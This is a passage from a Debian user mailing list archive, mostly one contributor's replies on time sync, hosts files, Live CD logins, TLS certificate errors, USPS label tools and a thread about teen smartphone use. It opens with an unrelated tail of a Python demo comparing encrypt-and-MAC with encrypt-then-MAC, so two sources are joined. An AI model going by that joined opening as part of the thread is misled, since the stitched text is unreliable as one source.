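    n1, n2 = os.urandom(NONCE_LEN), os.urandom(NONCE_LEN)
    print("E&A tags collide:", tags_collide(seal_encrypt_and_mac, ek, mk, b"retry", n1, n2))
    print("EtA tags collide:", tags_collide(seal_encrypt_then_mac, ek, mk, b"retry", n1, n2))
```

The E&A receiver also has to run the decryptor over attacker-controlled bytes before it can reject them, which is the practical root of the padding-oracle class of attacks; the EtA receiver rejects a forged packet without touching the cipher at all.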



Re: After installing no access to the installed system.

2024-03-18 Thread Jeffrey Walton
On Mon, Mar 18, 2024 at 4:32 PM Thomas Schweikle  wrote:
>
> Am Mo., 18.März.2024 um 16:44:32 schrieb Greg Wooledge:
> > On Mon, Mar 18, 2024 at 03:24:14PM +0100, Thomas Schweikle wrote:
> >> Package: Debian installer
> >> Version: As on Debian live-CD/DVD for Debian 12.5
> >> Severity: critical
> >
> > Note that you sent this email to the debian-user list, not to the bug
> > tracking system.
>
> I know. The bog tracking system wants me to use reportbug, but since I
> do not have access to the installed system i cant use reportbug to
> report a bug.

You could email the report to sub...@bugs.debian.org. No need for
reportbug. See "How to report a bug in Debian using email,"
.

Jeff



Re: OT: End the Phone-Based Childhood Now

2024-03-16 Thread Jeffrey Walton
On Fri, Mar 15, 2024 at 8:04 PM Emanuel Berg  wrote:
>
> Jeffrey Walton wrote:
>
> > So the problem with GenZ seems to be how they are growing up
> > and what they are spending their time on; and not their job
> > (they are teens!)
>
> They need other things to do that appeal to them more than
> smartphone idling. If such things existed, they would go
> for them, I'm confident.
>
> But it is also how things are presented, what mental picture
> they have, which is often incorrect. Today almost all
> activities, even pretty mundane things that were once thought
> of as relaxing and potentially inclusive to a whole bunch of
> people, are presented as elitist pursuits for the select few.
>
> They think, for example, "Martial arts seems like a lot of
> fun, but it is nothing for me, everyone who does it are great
> athletes and clearly I'm not." while in reality it is "_A lot_
> of people who does it are great athletes - and the reason why
> is because they do it". These kids only need to show up, but
> sadly, a lot of them don't, ever.
>
> So it is a vicious circle, the more they think they have to be
> brilliant to do anything the less confident they become from
> doing nothing.
>
> > and not society around them (which they withdraw from).
>
> Society pushed them away just as much.

I've got a feeling you did not read the article.

Jeff



Re: OT: End the Phone-Based Childhood Now

2024-03-15 Thread Jeffrey Walton
On Fri, Mar 15, 2024 at 7:09 PM Emanuel Berg  wrote:
>
> Jeffrey Walton wrote:
>
> > Fascinating reading here:
> > <https://www.theatlantic.com/technology/archive/2024/03/teen-childhood-smartphone-use-mental-health-effects/677722/>.
> > It completely explains why GenZ are having so many problems
> > with adulthood. Smartphones and Social Media are
> > the culprits.
>
> Society is the problem where you are either an elite prospect
> football player, a professional carpenter/construction worker,
> _or_ you don't get to do anything, ever.

The article did not discuss employment or socio-economics, other than to say:

The most recent Gallup data show that American teens spend about five
hours a day just on social-media platforms (including watching videos
on TikTok and YouTube). Add in all the other phone- and screen-based
activities, and the number rises to somewhere between seven and nine
hours a day, on average. The numbers are even higher in single-parent
and low-income families, and among Black, Hispanic, and Native American
families.

These very high numbers do not include time spent in front of screens
for school or homework, nor do they include all the time adolescents
spend paying only partial attention to events in the real world while
thinking about what they’re missing on social media or waiting for
their phones to ping. Pew reports that in 2022, one-third of teens said
they were on one of the major social-media sites “almost constantly,”
and nearly half said the same of the internet in general. For these
heavy users, nearly every waking hour is an hour absorbed, in full or
in part, by their devices.

So the problem with GenZ seems to be how they are growing up and what
they are spending their time on; and not their job (they are teens!),
and not society around them (which they withdraw from).

Jeff



Re: Please terminate this faecal matter - the whole thread appears to be a troll.....Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

2024-03-15 Thread Jeffrey Walton
On Fri, Mar 15, 2024 at 2:59 PM Bret Busby  wrote:
>
> On 16/3/24 02:27, Van Snyder wrote:
> > On Fri, 2024-03-15 at 11:09 -0700, Will Mengarini wrote:
> >> Seriously, you humans have only another five billion Earth years until
> >> your sun engulfs your home planet, and you're spending time on *THIS*?!
> >
> > At the rate that sea plants and creatures are removing CO2 from the
> > atmosphere to combine it with calcium to make bones and armor,
> > eventually eternal limestone, we have only about eighteen million years
> > until Gaia commits suicide. Why should we continue to be complicit?
> >
> > Read Patrick Moore. The Positive Impact of Human CO2 Emissions on the
> > Survival of Life on Earth. Frontier Science for Public Policy, June 2016.

++. That whole thread was fecal matter. Best to let it die...

Jeff



OT: End the Phone-Based Childhood Now

2024-03-15 Thread Jeffrey Walton
Fascinating reading here:
.
It completely explains why GenZ are having so many problems with
adulthood. Smartphones and Social Media are the culprits.

From the article:

Something went suddenly and horribly wrong for adolescents in the early
2010s. By now you’ve likely seen the statistics: Rates of depression
and anxiety in the United States—fairly stable in the 2000s—rose by
more than 50 percent in many studies from 2010 to 2019. The suicide
rate rose 48 percent for adolescents ages 10 to 19. For girls ages 10
to 14, it rose 131 percent.

The problem was not limited to the U.S.: Similar patterns emerged
around the same time in Canada, the U.K., Australia, New Zealand, the
Nordic countries, and beyond. By a variety of measures and in a variety
of countries, the members of Generation Z (born in and after 1996) are
suffering from anxiety, depression, self-harm, and related disorders at
levels higher than any other generation for which we have data.

The decline in mental health is just one of many signs that something
went awry. Loneliness and friendlessness among American teens began to
surge around 2012. Academic achievement went down, too. According to
“The Nation’s Report Card,” scores in reading and math began to decline
for U.S. students after 2012, reversing decades of slow but generally
steady increase. PISA, the major international measure of educational
trends, shows that declines in math, reading, and science happened
globally, also beginning in the early 2010s.

And:

Surveys show that members of Gen Z are shyer and more risk averse than
previous generations, too, and risk aversion may make them less
ambitious. In an interview last May, OpenAI co-founder Sam Altman and
Stripe co-founder Patrick Collison noted that, for the first time since
the 1970s, none of Silicon Valley’s preeminent entrepreneurs are under
30. “Something has really gone wrong,” Altman said. In a famously young
industry, he was baffled by the sudden absence of great founders in
their 20s.

If you can't read the whole article, head on over to the Wayback Machine.

Jeff



Re: libbusiness-us-usps-webtools-perl and USPS Ground Advantage shipping

2024-03-08 Thread Jeffrey Walton
On Fri, Mar 8, 2024 at 10:16 AM Charles Curley
 wrote:
>
> On Thu, 7 Mar 2024 23:15:13 -0500
> Jeffrey Walton  wrote:
>
> > I need to generate some shipping labels for drop-off at the USPS post
> > office using USPS Ground Advantage.
> >
> > I have a USB thermal printer for the shipping labels,
> > <https://www.amazon.com/gp/product/B08V28J3JS>.
> >
> > I see Debian carries libbusiness-us-usps-webtools-perl. I visited the
> > module's GitHub at
> > <https://github.com/ssimms/business-us-usps-webtools>, but the
> > examples are on the lite side. I don't see a workflow similar to
> > creating and printing a shipping label.
> >
> > My question is, can I use the module to create and print a shipping
> > label for a USPS Ground Advantage package?
>
> charles@jhegaala:~$ apt-cache show libbusiness-us-usps-webtools-perl
> Package: libbusiness-us-usps-webtools-perl
> Version: 1.125-2
> [...]
>
> So I would start at the web site for the Web Tools.
> http://www.usps.com/webtools/
>
> On a brief scan of that site, I think the answer is yes, but you have
> some software development ahead of you.

Yeah, I was thinking the perl package is not very useful. I don't need
a perl wrapper to make a web service call. I need the other value
added stuff, like printing a label once I receive a successful
response.

Thanks.

Jeff



libbusiness-us-usps-webtools-perl and USPS Ground Advantage shipping

2024-03-07 Thread Jeffrey Walton
Hi Everyone,

I need to generate some shipping labels for drop-off at the USPS post
office using USPS Ground Advantage.

I have a USB thermal printer for the shipping labels,
.

I see Debian carries libbusiness-us-usps-webtools-perl. I visited the
module's GitHub at
, but the
examples are on the lite side. I don't see a workflow similar to
creating and printing a shipping label.

My question is, can I use the module to create and print a shipping
label for a USPS Ground Advantage package?

Thanks in advance.



Re: Commandline client to lookup MAC vendor

2024-03-07 Thread Jeffrey Walton
On Thu, Mar 7, 2024 at 4:06 AM Ralph Aichinger  wrote:
>
> Several packages in Debian can somehow (either by embedding it or
> querying it from some common database) display the MAC Vendor
> information of network adapters (derived from hardware addresses).
>
> One example is nmap, that displays the device vendor when scanning.
>
> Is there some commandline tool doing this directly in Debian? I know
> that there are websites that offer this as a service, but sometimes a
> CLI is more convenient.
>
> Alternatively, and if this information is stored in some shared
> databases, can this be queried e.g. from a Pyhton script? If so, how?

Here's a Python project that does what you want:
. The update function
uses  as Lee suggested.

Jeff



Re: strange time problem with bullseye

2024-03-07 Thread Jeffrey Walton
On Thu, Mar 7, 2024 at 8:44 AM  wrote:
>
> On Thu, Mar 07, 2024 at 08:31:16AM -0500, gene heskett wrote:
>
> [...]
> Now, how do I assure timedatectl stays stopped on a reboot? [...]
>
> I'll have to leave this to others more fluent in systemd-ish.

Mask the systemd-timesyncd service. Masking the service has a permanent effect.

If you just stop or disable the service, then the service will either
be started on the next reboot, or it can be manually started. Since
you want to permanently disable the service, you have to mask it.

Jeff



Re: strange time problem with bullseye

2024-03-06 Thread Jeffrey Walton
On Wed, Mar 6, 2024 at 7:08 AM Greg Wooledge  wrote:
>
> On Wed, Mar 06, 2024 at 07:37:09AM +0200, Teemu Likonen wrote:
> > It seems that you have solved the problem but here is another hint.
> > "timedatectl" is a good high-level tool for querying and adjusting time
> > settings. Without command-line arguments it prints a lot of useful info:
> >
> > $ timedatectl
> >Local time: ke 2024-03-06 07:33:00 EET
> >Universal time: ke 2024-03-06 05:33:00 UTC
> >  RTC time: ke 2024-03-06 05:33:00
> > Time zone: Europe/Helsinki (EET, +0200)
> > System clock synchronized: yes
> >   NTP service: active
> >   RTC in local TZ: no
> >
> > See "timedatectl -h" or manual page for more info.
>
> This is a great hint, but be warned that it doesn't quite know about
> NTP services other than systemd-timesyncd.  If you're running ntpsec,
> for example, it'll simply say:
>
> System clock synchronized: yes
>   NTP service: n/a

This may help in the future:
.

Jeff



Re: strange time problem with bullseye

2024-03-06 Thread Jeffrey Walton
On Wed, Mar 6, 2024 at 12:13 PM Roy J. Tellason, Sr.  wrote:
>
> On Wednesday 06 March 2024 12:37:09 am Teemu Likonen wrote:
> > * 2024-03-06 02:47:06+0800, hlyg wrote:
> >
> > > my newly-installed deb11 for amd64 shows wrong time,  it lags behind
> > > correct time by 8 hours though difference between universal and local
> > > is ok.
> >
> > It seems that you have solved the problem but here is another hint.
> > "timedatectl" is a good high-level tool for querying and adjusting time
> > settings. Without command-line arguments it prints a lot of useful info:
> >
> > $ timedatectl
> >Local time: ke 2024-03-06 07:33:00 EET
> >Universal time: ke 2024-03-06 05:33:00 UTC
> >  RTC time: ke 2024-03-06 05:33:00
> > Time zone: Europe/Helsinki (EET, +0200)
> > System clock synchronized: yes
> >   NTP service: active
> >   RTC in local TZ: no
> >
> > See "timedatectl -h" or manual page for more info.
> >
>
> Mine shows:
>
>   Local time: Wed 2024-03-06 12:09:44 EST
>   Universal time: Wed 2024-03-06 17:09:44 UTC
> RTC time: Wed 2024-03-06 17:20:53
>Time zone: America/New_York (EST, -0500)
>  Network time on: yes
> NTP synchronized: no
>  RTC in local TZ: no
>
> How do I get the RTC to agree with the right time?  I don't reboot this 
> often,  but when I do the time displayed on the onscreen clock is typically 
> off by several minutes.

Install ntp, ntpsec or systemd-timesyncd. Once installed and time is
sync'd, run 'sudo hwclock -w'.

Also see  and
.

Jeff
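
The advice above in script form, as an added example that is not part of the thread: find out how far the RTC is from the system clock, and write it with `hwclock -w` only once the system clock is actually NTP-synchronized (otherwise you copy a wrong time into the RTC). The parser accepts both the older "NTP synchronized:" and the newer "System clock synchronized:" wording that appear in this thread, and it refuses to compare clocks when "RTC in local TZ" is yes, because the RTC field is then not in UTC. It assumes GNU `date -d` as on Debian. SAMPLE is constructed from the figures Roy posted and is only used for the offline self-check.

```shell
#!/bin/sh
# Added example (not from the thread): compare the RTC with the system clock
# using timedatectl's output, then write the RTC only when it is safe to.

# Exit 0 if the timedatectl text on stdin says the system clock is NTP-synced.
ntp_synced() {
    grep -Eq '^ *(System clock synchronized|NTP synchronized): *yes *$'
}

# Print RTC minus UTC in seconds from timedatectl text on stdin.
# Exit 3 when the RTC is kept in local time (its field is then not comparable
# with "Universal time"), exit 2 when a field cannot be parsed.
rtc_drift_seconds() {
    out=$(cat)
    if printf '%s\n' "$out" | grep -Eq '^ *RTC in local TZ: *yes'; then
        echo "RTC runs in local time; drift not computed" >&2
        return 3
    fi
    utc=$(printf '%s\n' "$out" | sed -n 's/^ *Universal time: *[A-Za-z]* *\([0-9-]* [0-9:]*\) UTC *$/\1/p')
    rtc=$(printf '%s\n' "$out" | sed -n 's/^ *RTC time: *[A-Za-z]* *\([0-9-]* [0-9:]*\) *$/\1/p')
    [ -n "$utc" ] && [ -n "$rtc" ] || return 2
    utc_s=$(date -u -d "$utc" +%s) || return 2   # GNU date
    rtc_s=$(date -u -d "$rtc" +%s) || return 2
    echo $((rtc_s - utc_s))
}

# If the system clock is trustworthy and the RTC is off by more than MAX
# seconds (default 5), write the system time to the RTC, as the post suggests.
sync_rtc_if_needed() {
    max=${1:-5}
    out=$(timedatectl) || return 1
    if ! printf '%s\n' "$out" | ntp_synced; then
        echo "system clock is not NTP-synchronized; refusing to write the RTC" >&2
        return 1
    fi
    drift=$(printf '%s\n' "$out" | rtc_drift_seconds) || return 1
    echo "RTC drift: ${drift}s"
    if [ "${drift#-}" -gt "$max" ]; then
        sudo hwclock -w
    fi
}

# Constructed sample, taken from the figures posted above (RTC 11m09s ahead).
SAMPLE='               Local time: Wed 2024-03-06 12:09:44 EST
           Universal time: Wed 2024-03-06 17:09:44 UTC
                 RTC time: Wed 2024-03-06 17:20:53
                Time zone: America/New_York (EST, -0500)
          Network time on: yes
         NTP synchronized: no
          RTC in local TZ: no'

if [ "${1-}" = --run ]; then
    sync_rtc_if_needed
fi
```

Run it as `sh rtc-check.sh --run` on the machine itself. On Roy's output it would stop at the "not NTP-synchronized" check, which is the right outcome: install and start the time daemon first, confirm the synchronized line says yes, and only then let it write the RTC.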



Re: strange time problem with bullseye

2024-03-05 Thread Jeffrey Walton
On Tue, Mar 5, 2024 at 7:07 PM hlyg  wrote:
>
>  [...]
>
> Windows shall not cause problem, i rarely use Windows
>
> i don't know if ntp is running, what's default configuration by deb11
> amd64 installer?

If you are dual booting Linux and Windows, then see
.

Jeff



Re: Debian 12 live cd username and password problem

2024-03-05 Thread Jeffrey Walton
On Tue, Mar 5, 2024 at 11:30 AM Jeffrey Walton  wrote:
>
> On Tue, Mar 5, 2024 at 11:22 AM genti pp  wrote:
> >
> > I want to install debian 12 but I need to try it first.
> > Having Debian 12 live iso it asks me for username and password. Please tell 
> > me the correct username and password so I can try it.
>
> I usually use 'sudo su -' from the command line. Sometimes it does not
> prompt for a password. I don't recall if that's the case for a Debian
> Live cd.
>
> A quick Google search also turns up {user,live} pairs. I'm not sure if
> it is correct because I don't see a _recent_ answer from debian.org.
> Also see 
> <https://www.google.com/search?q=Debian+Live+password+site:debian.org>.

This information is now documented at
<https://wiki.debian.org/Root#Debian_Live_CD>. It was tested against a
Live CD for Debian 12.5.

Jeff



Re: Debian 12 live cd username and password problem

2024-03-05 Thread Jeffrey Walton
On Tue, Mar 5, 2024 at 11:22 AM genti pp  wrote:
>
> I want to install debian 12 but I need to try it first.
> Having Debian 12 live iso it asks me for username and password. Please tell 
> me the correct username and password so I can try it.

I usually use 'sudo su -' from the command line. Sometimes it does not
prompt for a password. I don't recall if that's the case for a Debian
Live cd.

A quick Google search also turns up {user,live} pairs. I'm not sure if
it is correct because I don't see a _recent_ answer from debian.org.
Also see .

Jeff



Re: a couple rpi problems

2024-03-04 Thread Jeffrey Walton
On Mon, Mar 4, 2024 at 11:07 PM ghe2001  wrote:
>
> On Monday, March 4th, 2024 at 5:01 PM, Greg Wooledge  
> wrote:
> [...]
> > So, "pi5" appears to be your hostname.
>
> Yup.
>
> > It can't resolve its own hostname. You're probably missing a line in
> > your /etc/hosts file.
>
> Oh!  It wants the IP!  You're right -- pi5 isn't in there.  Thanks.

Here's what one looks like for a host named 'raptor' after the Intel ISA:

$ cat /etc/hosts
# Loopback entries; do not change.
# For historical reasons, localhost precedes localhost.localdomain:
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4

# 127.0.1.1 is often used for the FQDN of the machine
127.0.1.1   raptor.home.arpa raptor

# The following lines are desirable for IPv6 capable hosts
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
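
The check the thread boils down to, as an added example (not from the post): confirm that the machine's own hostname is mapped in /etc/hosts before anything that resolves it runs. `hosts_lookup` strips comments and matches the name against every alias on a line, not just the first; `check_self` applies it to `hostname`. The sample file in the test is constructed from the entries shown above.

```shell
#!/bin/sh
# Added example (not from the thread): look a name up in an /etc/hosts-style
# file, and verify that this host's own name is present.

# usage: hosts_lookup FILE NAME -> prints the address, exit 1 if the name is absent
hosts_lookup() {
    awk -v name="$2" '
        { sub(/#.*/, "") }                       # drop comments, whole-line or trailing
        NF >= 2 {                                # address followed by one or more names
            for (i = 2; i <= NF; i++)
                if ($i == name) { print $1; found = 1; exit }
        }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# usage: check_self [FILE]  (default /etc/hosts); exit 1 with a hint if unmapped
check_self() {
    f=${1:-/etc/hosts}
    n=$(hostname)
    if addr=$(hosts_lookup "$f" "$n"); then
        echo "$n -> $addr"
    else
        echo "$n is not in $f; add a line such as: 127.0.1.1 $n.home.arpa $n" >&2
        return 1
    fi
}
```

`getent hosts "$(hostname)"` asks the resolver the same question through nsswitch, which is the quicker check on a live system; the function above is for auditing a hosts file you are about to install, or one inside a chroot or image.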



Re: Wifi - unable to connect. [solved]

2024-03-04 Thread Jeffrey Walton
On Mon, Mar 4, 2024 at 4:58 PM Greg  wrote:
>
> On 2/26/24 18:52, Kamil Jońca wrote:
> [...]
> >
> > What if:
> > network = {
> >   ssid="ssid"
> >   key_mgmt=WPA-EAP
> >   eap=PEAP
> >   identity="uid"
> >   phase2="auth=MSCHAPV2"
> >   mesh_fwding=1
> >   password="pas"
> >   }

The MSCHAPv2 is like a dagger in my eye. Are you required to use it?



Jeff



Re: resolv.conf (was Re: electrons/the Internet [racism redacted])

2024-03-04 Thread Jeffrey Walton
On Mon, Mar 4, 2024 at 4:12 PM Greg Wooledge  wrote:
>
> On Mon, Mar 04, 2024 at 12:36:54PM -0800, David Christensen wrote:
> > I believe Debian rewrites /etc/resolv.conf on every boot.
>
> This is not correct.  It's *partly* correct if you ignore a lot of
> complicating factors.
> [...]
>
> All of this is documented on 
> but it's a virtual certainty that nobody in this thread will read that
> wiki page and select a strategy and implement it and be happy.  Instead,
> we will have another hundred-message argument, in which half the
> participants will have no idea what the issue is (but will chime in loudly
> anyway), and the second half will simply attack whatever strategies the
> third half have selected.

Lol... so true. The internet never misses an opportunity to argue!

> resolv.conf (was Re: electrons/the Internet [racism redacted])

And I think I hear someone approaching with the Mjölnir hammer.
Someone might be plonked over the head.

Jeff



Re: “Secure Connection Failed” Error in Firefox

2024-03-03 Thread Jeffrey Walton
On Sun, Mar 3, 2024 at 2:02 PM Jeffrey Walton  wrote:
>
> On Sun, Mar 3, 2024 at 1:47 PM Marcelo Laia  wrote:
> >
> > Hello Debian users!
> >
> > When accessing the website https://gontijoonibus.gontijo.com.br/ on Firefox 
> > Android (on my smartphone), the site is accessed normally. However, when 
> > attempting to access this site on the desktop, Debian Firefox-ESR version 
> > 115.8.0esr (64-bit), the following error occurs:
> >
> > Secure Connection Failed
> > An error occurred during a connection to gontijoonibus.gontijo.com.br.
> > The page you are trying to view cannot be displayed because the 
> > authenticity of the received data could not be verified.
> > Please contact the website owners to inform them of this problem.
>
> According to OpenSSL and the default CA list on Ubuntu 22.04, the
> connection looks Ok. The problem appears to be more than a simple
> problem connecting.
>
> If I had to hazard a guess, I would start with the wildcard in the
> Common Name (CN) shown below. I know the CA/Browser Baseline
> Requirements changed recently, and CN is now a SHOULD NOT. Wildcards
> have been frowned upon but not forbidden. Maybe the browsers are
> moving against wildcards in the CN now.
>
> Note: tooling, like cURL, OpenSSL and Wget follow the IETF's Internet
> PKI (PKIX). Browsers follow the CA/Browsers Baseline Requirements (Web
> PKI). They mostly overlap, but they have a fair amount of differences
> once you accumulate some knowledge about them.
>
> And the IETF lawyers wrote a nasty letter to the W3C a couple of years
> ago because the W3C was publishing incompatible standards. See
> <https://www.ietf.org/media/documents/2023.01.26_Correspondence_IETF.pdf>.
> And from my observations, the CA/Browser Forums have been doing the
> same thing. So I would not be surprised if there's an incompatible
> change between PKIX and Web PKI.
>
> 
> $ echo -e 'GET / HTTP/1.1\r\n\r\n' | openssl s_client -connect
> gontijoonibus.gontijo.com.br:443 -servername
> gontijoonibus.gontijo.com.br
> CONNECTED(0003)
> depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
> verify return:1
> depth=1 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte
> TLS RSA CA G1
> verify return:1
> depth=0 CN = *.gontijo.com.br
> verify return:1
> ---
> Certificate chain
>  0 s:CN = *.gontijo.com.br
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA 
> G1
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: May  9 00:00:00 2023 GMT; NotAfter: May  8 23:59:59 2024 GMT
>  1 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA 
> G1
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: Nov  2 12:24:25 2017 GMT; NotAfter: Nov  2 12:24:25 2027 GMT
>  2 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
> Global Root G2
>a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
>v:NotBefore: Aug  1 12:00:00 2013 GMT; NotAfter: Jan 15 12:00:00 2038 GMT
> ---
> Server certificate
> -BEGIN CERTIFICATE-
> MIIGITCCBQmgAwIBAgIQB7Bs73IlM/884Dqb8/YZoTANBgkqhkiG9w0BAQsFADBe
> MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
> d3cuZGlnaWNlcnQuY29tMR0wGwYDVQQDExRUaGF3dGUgVExTIFJTQSBDQSBHMTAe
> Fw0yMzA1MDkwMDAwMDBaFw0yNDA1MDgyMzU5NTlaMBsxGTAXBgNVBAMMECouZ29u
> dGlqby5jb20uYnIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoYUM
> EjKsU7gHu5iZpkwZkwJGyMe1l5d1+YVUJLkB23vxGXxSRoYVOqhPR/sbvyue0FFA
> OwbKriu+XjXA/dCOC6hEX9UbvHK9i5YFaPbJIDkwZKuA3SltFSyJsuRNP7dpYEkY
> uxZ4pcLBtEAh9+im1g5l4ubrFDrxdr5Wvjne6viDyZ+40Alc+i1pirlymsD7k6tH
> 4bLaR+qopr6YqufzOkWlcodNbCnQ3TF1ZOVppwJDYvWaROQ8WcUC5c3v4TDYcXrq
> YasWMtN2GL+UwQL4Gc/q9slkpG1ML8lX50CwxhGAngjz8PdNq9ql+kHa9XfTx+5G
> DYrshriHimk9POppAgMBAAGjggMcMIIDGDAfBgNVHSMEGDAWgBSljP4yzOsPLNQZ
> xgi4ACSIXcPFtzAdBgNVHQ4EFgQUOgqjT5nVOc1VYZ8vm/Y80TI7UIEwKwYDVR0R
> BCQwIoIQKi5nb250aWpvLmNvbS5icoIOZ29udGlqby5jb20uYnIwDgYDVR0PAQH/
> BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjA7BgNVHR8ENDAy
> MDCgLqAshipodHRwOi8vY2RwLnRoYXd0ZS5jb20vVGhhd3RlVExTUlNBQ0FHMS5j
> cmwwPgYDVR0gBDcwNTAzBgZngQwBAgEwKTAnBggrBgEFBQcCARYbaHR0cDovL3d3
> dy5kaWdpY2VydC5jb20vQ1BTMHAGCCsGAQUFBwEBBGQwYjAkBggrBgEFBQcwAYYY
> aHR0cDovL3N0YXR1cy50aGF3dGUuY29tMDoGCCsGAQUFBzAChi5odHRwOi8vY2Fj
> ZXJ0cy50aGF3dGUuY29tL1RoYXd0ZVRMU1JTQUNBRzEuY3J0MAkGA1UdEwQCMAAw
> ggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB2AO7N0GTV2xrOxVy3nbTNE6Iyh0Z8
> vOzew1FIWUZxH7WbAAABi
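
The `openssl s_client` listing above, turned into something a script can act on; this is an added example and not part of either message. `leaf_not_after` pulls the depth-0 NotAfter value out of the "Certificate chain" section and `days_until` converts it into days remaining, so a cron job can warn before a leaf expires (the one above ran out on 2024-05-08). It assumes GNU `date -d`; `check_host` needs network access and is not exercised by the self-check. SAMPLE is the chain summary from the post, reduced to the lines the parser reads.

```shell
#!/bin/sh
# Added example (not from the thread): extract the leaf certificate's expiry
# from `openssl s_client` output and compute the days left.

# stdin: s_client output; prints the depth-0 NotAfter value, e.g. "May  8 23:59:59 2024 GMT"
leaf_not_after() {
    awk '
        /^ *0 s:/ { leaf = 1; next }                 # start of the depth-0 (leaf) entry
        /^ *[1-9][0-9]* s:/ { leaf = 0 }              # any other depth ends it
        leaf && /NotAfter:/ { sub(/.*NotAfter: */, ""); print; exit }
    '
}

# usage: days_until NOTAFTER [REFERENCE-TIME]  -> whole days from reference (default now)
days_until() {
    end=$(date -u -d "$1" +%s) || return 2      # GNU date parses OpenSSL's date format
    now=$(date -u -d "${2:-now}" +%s) || return 2
    echo $(( (end - now) / 86400 ))
}

# usage: check_host HOST [MIN_DAYS]  -> exit 1 if the leaf expires within MIN_DAYS (default 14)
check_host() {
    out=$(openssl s_client -connect "$1:443" -servername "$1" </dev/null 2>/dev/null) || return 2
    na=$(printf '%s\n' "$out" | leaf_not_after)
    [ -n "$na" ] || return 2
    left=$(days_until "$na") || return 2
    echo "$1: leaf certificate expires $na ($left days left)"
    [ "$left" -ge "${2:-14}" ]
}

# Constructed sample: the chain summary posted above, unwrapped.
SAMPLE='---
Certificate chain
 0 s:CN = *.gontijo.com.br
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: May  9 00:00:00 2023 GMT; NotAfter: May  8 23:59:59 2024 GMT
 1 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  2 12:24:25 2017 GMT; NotAfter: Nov  2 12:24:25 2027 GMT
---'
```

One caveat when comparing with a browser: the chain summary shows only the subject CN, while browsers match the host name against subjectAltName. To see what Firefox is actually matching, pipe the server certificate through `openssl x509 -noout -subject -ext subjectAltName` rather than reading the `s:` line.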

Re: “Secure Connection Failed” Error in Firefox

2024-03-03 Thread Jeffrey Walton
On Sun, Mar 3, 2024 at 1:47 PM Marcelo Laia  wrote:
>
> Hello Debian users!
>
> When accessing the website https://gontijoonibus.gontijo.com.br/ on Firefox 
> Android (on my smartphone), the site is accessed normally. However, when 
> attempting to access this site on the desktop, Debian Firefox-ESR version 
> 115.8.0esr (64-bit), the following error occurs:
>
> Secure Connection Failed
> An error occurred during a connection to gontijoonibus.gontijo.com.br.
> The page you are trying to view cannot be displayed because the authenticity 
> of the received data could not be verified.
> Please contact the website owners to inform them of this problem.

According to OpenSSL and the default CA list on Ubuntu 22.04, the
connection looks Ok. The problem appears to be more than a simple
problem connecting.

If I had to hazard a guess, I would start with the wildcard in the
Common Name (CN) shown below. I know the CA/Browser Baseline
Requirements changed recently, and CN is now a SHOULD NOT. Wildcards
have been frowned upon but not forbidden. Maybe the browsers are
moving against wildcards in the CN now.

Note: tooling, like cURL, OpenSSL and Wget follow the IETF's Internet
PKI (PKIX). Browsers follow the CA/Browsers Baseline Requirements (Web
PKI). They mostly overlap, but they have a fair amount of differences
once you accumulate some knowledge about them.

And the IETF lawyers wrote a nasty letter to the W3C a couple of years
ago because the W3C was publishing incompatible standards. See
.
And from my observations, the CA/Browser Forums have been doing the
same thing. So I would not be surprised if there's an incompatible
change between PKIX and Web PKI.


$ echo -e 'GET / HTTP/1.1\r\n\r\n' | openssl s_client -connect
gontijoonibus.gontijo.com.br:443 -servername
gontijoonibus.gontijo.com.br
CONNECTED(0003)
depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
verify return:1
depth=1 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte
TLS RSA CA G1
verify return:1
depth=0 CN = *.gontijo.com.br
verify return:1
---
Certificate chain
 0 s:CN = *.gontijo.com.br
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: May  9 00:00:00 2023 GMT; NotAfter: May  8 23:59:59 2024 GMT
 1 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = Thawte TLS RSA CA G1
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  2 12:24:25 2017 GMT; NotAfter: Nov  2 12:24:25 2027 GMT
 2 s:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   i:C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert
Global Root G2
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Aug  1 12:00:00 2013 GMT; NotAfter: Jan 15 12:00:00 2038 GMT
---
Server certificate
-BEGIN CERTIFICATE-



